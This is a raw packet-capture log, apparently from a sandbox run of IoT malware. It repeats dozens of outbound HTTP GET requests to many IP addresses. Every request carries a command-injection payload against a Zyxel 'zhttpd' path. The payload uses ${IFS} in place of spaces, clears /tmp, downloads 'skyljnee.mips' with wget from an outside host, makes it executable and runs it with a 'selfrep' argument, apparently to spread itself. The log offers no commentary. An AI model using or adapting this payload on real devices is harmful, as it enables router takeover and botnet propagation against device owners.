                                                Jan 28, 2024 10:16:35.977636099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7259192.168.2.2356564128.220.173.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977680922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7260192.168.2.2357008219.253.219.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977691889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7261192.168.2.235610491.83.20.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977729082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7262192.168.2.2358500170.11.23.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977745056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7263192.168.2.2341702177.50.118.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977771044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7264192.168.2.2336236112.233.22.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977802992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7265192.168.2.2356316115.17.208.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977829933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7266192.168.2.233844284.44.144.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977866888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7267192.168.2.2342744217.176.156.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977901936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7268192.168.2.2347552115.205.161.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977925062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7269192.168.2.234803849.196.73.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977926970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7270192.168.2.2353592209.111.43.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.977998972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7271192.168.2.2359438180.252.1.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978017092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7272192.168.2.234314069.1.42.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978040934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7273192.168.2.235588040.164.235.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978063107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7274192.168.2.2336828203.238.208.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978118896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7275192.168.2.235980265.161.134.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978130102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7276192.168.2.23430081.89.94.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978141069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7277192.168.2.2339968182.113.198.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978173018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7278192.168.2.234027273.116.235.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978195906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7279192.168.2.233428067.67.168.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978210926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7280192.168.2.235049296.147.212.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978264093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7281192.168.2.2338936211.74.157.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978285074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7282192.168.2.235400232.39.217.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978317022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7283192.168.2.2352302113.44.44.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978337049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7284192.168.2.2354408113.42.105.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978372097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7285192.168.2.2354102113.226.160.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978404999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7286192.168.2.233882283.32.31.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978423119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7287192.168.2.2355532139.229.33.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978457928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7288192.168.2.2346532178.74.26.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978504896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7289192.168.2.2336054167.200.69.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978523016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7290192.168.2.233397625.200.119.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978555918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7291192.168.2.23443925.226.179.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978584051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7292192.168.2.234010689.117.152.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978612900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7293192.168.2.235238699.66.108.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978626013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7294192.168.2.233689096.45.207.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978642941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7295192.168.2.2358378197.186.22.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978686094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7296192.168.2.2339386123.186.223.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978710890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7297192.168.2.235919453.50.11.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978729010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7298192.168.2.236067495.12.20.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978769064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7299192.168.2.2343932149.180.188.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978797913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7300192.168.2.23514762.15.2.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978830099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7301192.168.2.234915823.0.26.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978837013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7302192.168.2.235032289.189.199.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978874922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7303192.168.2.2356736176.110.236.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978914022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7304192.168.2.23493569.81.93.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.978934050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7305192.168.2.2345200132.104.46.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.981832027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7306192.168.2.2358882135.141.212.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.981852055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7307192.168.2.2349116178.34.97.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.987790108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7308192.168.2.235883439.70.186.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.987812996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7309192.168.2.2344390163.208.164.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.987848043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7310192.168.2.2354784133.123.40.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.987867117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7311192.168.2.233988297.56.3.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.987879992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7312192.168.2.2335930132.201.221.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.987911940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7313192.168.2.234802899.226.161.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.987952948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7314192.168.2.233491698.187.213.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.987970114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7315192.168.2.2346450156.104.84.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.987999916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7316192.168.2.234711084.131.201.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988033056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7317192.168.2.234875292.3.52.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988056898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7318192.168.2.234783282.144.252.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988105059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7319192.168.2.234210217.254.32.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988126993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7320192.168.2.2357688142.114.187.173443
                                                TimestampBytes transferredDirectionData
